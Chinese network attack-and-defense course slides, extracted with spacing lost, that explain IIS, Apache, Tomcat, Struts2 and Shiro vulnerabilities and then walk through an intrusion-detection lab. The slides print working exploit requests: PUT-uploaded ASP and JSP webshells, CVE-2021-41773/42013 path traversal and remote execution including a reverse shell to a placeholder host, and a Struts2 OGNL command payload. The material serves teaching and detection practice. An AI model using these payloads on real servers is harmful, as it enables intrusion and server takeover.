《網(wǎng)絡(luò)攻防與協(xié)議分析》課件-1.關(guān)于漏洞后門防護的入侵檢測配置

關(guān)于漏洞后門防護的

入侵檢測配置1中間件漏洞IIS解析漏洞IIS6.0版本，會將“1.asp;.ipg”這樣的文件當作ASP文件解析。在計算機對文件擴展名的理解上來說，文件擴展名是以最后一個“.”的后面內(nèi)容為據(jù)的，這個文件被網(wǎng)站過濾程序理解成了圖片。而實際上，IIS會認為分號即是結(jié)尾，后面內(nèi)容被“截斷”了，認為這是ASP文件，于是產(chǎn)生了差異，差異即是不安全。OPTIONS/xHTTP1.1Host:探測是否允許PUT方法上傳PUT/x.txtHTTP1.1Host:Content-Length:30<%executerequest(“123456”)%>#上傳的內(nèi)容上傳一個txt文件COPY/x.txtHTTP1.1Host:Destination:/cmd.asp#將x.txt重命名為cmd.asp(由于解析漏洞)通過move或copy重命名文件Apache解析漏洞因為Apache認為一個文件可以擁有多個擴展名，哪怕沒有文件名，也可以擁有多個擴展名。Apache認為應(yīng)該從右到左開始判斷解析方法的。如果最右側(cè)的擴展名為不可識別的，就繼續(xù)往左判斷，直到判斷到文件名為止。Apache漏洞-CVE-2021-41773ApacheHTTPServer2.4.49、2.4.50版本對路徑規(guī)范化所做的更改中存在一個路徑穿越漏洞，攻擊者可利用該漏洞讀取到Web目錄外的其他文件，如系統(tǒng)配置文件、網(wǎng)站源碼等，甚至在特定情況下，攻擊者可構(gòu)造惡意請求執(zhí)行命令，控制服務(wù)器。GET/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd文件讀取POST/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/shHTTP/1.1Host:7:53238Content-Type:text/plainContent-Length:8echo;idRCE命令執(zhí)行Apache漏洞-CVE-2021-42013ApacheHTTPServer2.4.50中針對CVE-2021-41773的修復不夠充分。攻擊者可以使用路徑遍歷攻擊將URL映射到由類似別名的指令配置的目錄之外的文件。如果這些目錄之外的文件不受通常的默認配置“要求全部拒絕”的保護，則這些請求可能會成功。如果還為這些別名路徑啟用了CGI腳本，則這可能允許遠程代碼執(zhí)行。POST/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/shHTTP/1.1Host::29045Cache-Control:max-age=0Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Connection:closeContent-Type:application/x-www-form-urlencodedecho;echo"exec/bin/sh0</dev/tcp/x.x.x.x/88881>&02>&0">/tmp/a.shRCE命令執(zhí)行Tomcat解析漏洞-CVE-2017-12615CVE-2017-12615漏洞稱之為TomcatPUT方法任意寫文件漏洞，類似IIS的PUT上傳漏洞。該漏洞可以利用HTTP的PUT方法直接上傳webshell到目標服務(wù)器，從而獲取權(quán)限。該漏洞是高危漏洞，在Tomcat的web.xml默認情況下不存在該漏洞，但是一單開發(fā)者或者運維人員手動講web.xml中的readonly設(shè)置為false，可以通過PUT/DELETE進行文件操控。PUT/shell.jsp/HTTP/1.1Host:Content-Length:10<%Processprocess=Runtime.getRuntime().exec(request.getParameter("cmd"));%>POC2框架漏洞Struts2-S2-01漏洞原理：該漏洞因用戶提交表單數(shù)據(jù)并驗證失敗時，后端會將用戶之前提交的參數(shù)使用OGNL表達式%（value）進行解析，然后重新填充到對應(yīng)的表單數(shù)據(jù)中，如注冊或登錄頁面，提交失敗后一般會默認返回之前提交餓數(shù)據(jù)，由于后端使用%（value）對提交的數(shù)據(jù)執(zhí)行了一次OGNL表達式解析，所以可以直接構(gòu)造Payload進行命令執(zhí)行構(gòu)造poc，填到password框，執(zhí)行命令%{#a=(newjava.lang.ProcessBuilder(newjava.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=newjava.io.InputStreamReader(#b),#d=newjava.io.BufferedReader(#c),#e=newchar[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(newjava.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}Struts2-S2-05漏洞原理：S2-005漏洞起源于S2-003（受影響版本：低于Struts2.0.12），struts2會將http的每個參數(shù)名解析為OGNL語句執(zhí)（可理解為java代碼）。OGNL表達式通過#來訪問struts對象，struts框架通過過濾#字符防止安全問題，然而通過unicode編碼（\u0023）或8進制（\43）即繞過了安全限制，對于S2-003漏洞，官方通過增加安全配置（禁止靜態(tài)方法調(diào)用和類方法執(zhí)行等）來修補，但是安全配置被繞過導致漏洞，攻擊者可以利用OGNL表達式將這兩個選項打開命令執(zhí)行Struts2-S2-013漏洞原理：Struts2標簽中<s:a>和<s:url>都包含一個includeParams屬性，其值可設(shè)置為none，get或all，參考官方其對應(yīng)意義如下：none-鏈接不包含請求的任意參數(shù)值（默認）get-鏈接只包含GET請求中的參數(shù)和其值all-鏈接包含GET和POST所有參數(shù)和其值<s:a>用來顯示一個超鏈接，當includeParams=all的時候，會將本次請求的GET和POST參數(shù)都放在URL的GET參數(shù)上。在放置參數(shù)的過程中會將參數(shù)進行OGNL渲染，造成任意命令執(zhí)行漏洞。Struts2-S2-048ApacheStruts22.3.x系列啟用了struts2-struts1-plugin插件并且存在struts2-showcase目錄，其漏洞成因是當ActionMessage接收客戶可控的參數(shù)數(shù)據(jù)時，由于后續(xù)數(shù)據(jù)拼接傳遞后處理不當導致任意代碼執(zhí)行Struts2-S2-057漏洞產(chǎn)生于網(wǎng)站配置XML時如果沒有設(shè)置namespace的值，并且上層動作配置中并沒有設(shè)置或使用通配符namespace時，可能會導致遠程代碼執(zhí)行漏洞的發(fā)生。同樣也可能因為url標簽沒有設(shè)置value和action的值，并且上層動作并沒有設(shè)置或使用通配符namespace，從而導致遠程代碼執(zhí)行漏洞的發(fā)生。需要進行URL編碼Shiro漏洞-CVE-2010-3863在ApacheShiro1.1.0以前的版本中，shiro進行權(quán)限驗證前未對url做標準化處理，攻擊者可以構(gòu)造/、//、/./、/../

等繞過權(quán)限驗證構(gòu)造惡意請求/./admin，即可繞過權(quán)限校驗，訪問到管理頁面：Shiro漏洞-CVE-2016-4437ApacheShiro框架提供了記住我（RememberMe）的功能，關(guān)閉了瀏覽器下次再打開時還是能記住你是誰，下次訪問時無需再登錄即可訪問。Shiro對rememberMe的cookie做了加密處理，Shiro在CookieRememberMeManaer類中將cookie中rememberMe字段內(nèi)容分別進行序列化、AES加密、Base64編碼操作。但是，AES加密的密鑰Key被硬編碼在代碼里，攻擊者構(gòu)造一個惡意的對象，并且對其序列化，AES加密，base64編碼后，作為cookie的rememberMe字段發(fā)送。Shiro將rememberMe進行解密并且反序列化，最終造成反序列化漏洞。Shiro漏洞-CVE-2020-1957ApacheShiro1.5.2之前版本中存在安全漏洞。攻擊者可借助特制的請求利用該漏洞繞過身份驗證。Shiro框架通過攔截器功能來對用戶訪問權(quán)限進行控制，如anon,authc等攔截器。anon為匿名攔截器，不需要登錄即可訪問；authc為登錄攔截器，需要登錄才可以訪問。Shiro的URL路徑表達式為Ant格式，路徑通配符*表示匹配零個或多個字符串，/*可以匹配/hello，但是匹配不到/hello/，因為*通配符無法匹配路徑。假設(shè)/hello接口設(shè)置了authc攔截器，訪問/hello會進行權(quán)限判斷，但如果訪問的是/hello/，那么將無法正確匹配URL，直接放行，進入到spring攔截器。spring中的/hello和/hello/形式的URL訪問的資源是一樣的，從而實現(xiàn)了權(quán)限繞過。3漏洞后門檢測實驗漏洞檢測配置實驗關(guān)于本實驗通過配置入侵檢測策略，實現(xiàn)漏洞后門的檢測。實驗?zāi)康睦斫饴┒春箝T的原理，練習入侵檢測策略的配置。實驗背景Kali主機和靶機之間，通過防火墻設(shè)備進行網(wǎng)絡(luò)連接，防火墻將連接靶機的流量，通過端口鏡像引流到入侵檢測設(shè)備。IDSge2LANAge3LANBge4LANCge2LANCens33LANBeth0LAN

AKali主機CentOS靶機入侵檢測防火墻/24/24漏洞檢測配置實驗-基礎(chǔ)配置拓撲搭建基礎(chǔ)配置1、防火墻接口IP地址配置#啟動“pikachu”

靶場，sudo密碼centos[centos@localhost~]#sudodockerstartpikachuIDSge2LANAge3LANBge4LANCge2LANCens33LANBeth0LAN

AKali主機CentOS靶機入侵檢測防火墻/24/24漏洞檢測配置實驗-基礎(chǔ)配置拓撲搭建基礎(chǔ)配置2、防火墻配置DHCPIDSge2LANAge3LANBge4LANCge2LANCens33LANBeth0LAN

AKali主機CentOS靶機入侵檢測防火墻/24/24漏洞檢測配置實驗-基礎(chǔ)配置拓撲搭建基礎(chǔ)配置3、防火墻ge3接口配置鏡像接口引流IDSge2LANAge3LANBge4LANCge2LANCens33LANBeth0LAN

AKali主機CentOS靶機入侵檢測防火墻/24/24漏洞檢測配置實驗-基礎(chǔ)配置拓撲搭建基礎(chǔ)配置4、防火墻配置一條全通策略，放通流量IDSge2LANAge3LANBge4LANCge2LANCens33LANBeth0LAN

AKali主機CentOS靶機入侵檢測防火墻/24/24漏洞檢測配置實驗-基礎(chǔ)配置拓撲搭建基礎(chǔ)配置5、配置入侵檢測ge2接口為“旁路模式”IDSge2LANAge3LANBge4LANCge2LANCens33LANBeth0LAN

AKali主機CentOS靶機入侵檢測防火墻/24/24漏洞檢測配置實驗-漏洞后門檢測配置漏洞攻擊入侵檢測配置1、配置漏洞后門的檢測策略，實現(xiàn)Struts2S2-048漏洞的檢測IDSge2LANAge3LANBge4LANCge2LANCens33LANBeth0LAN

AKali主機CentOS靶機入侵檢測防火墻/24/24漏洞檢測配置實驗-實驗驗證實驗驗證1、CentOS使用docker開啟S2-048靶機 sudodockerstarts2-048-strut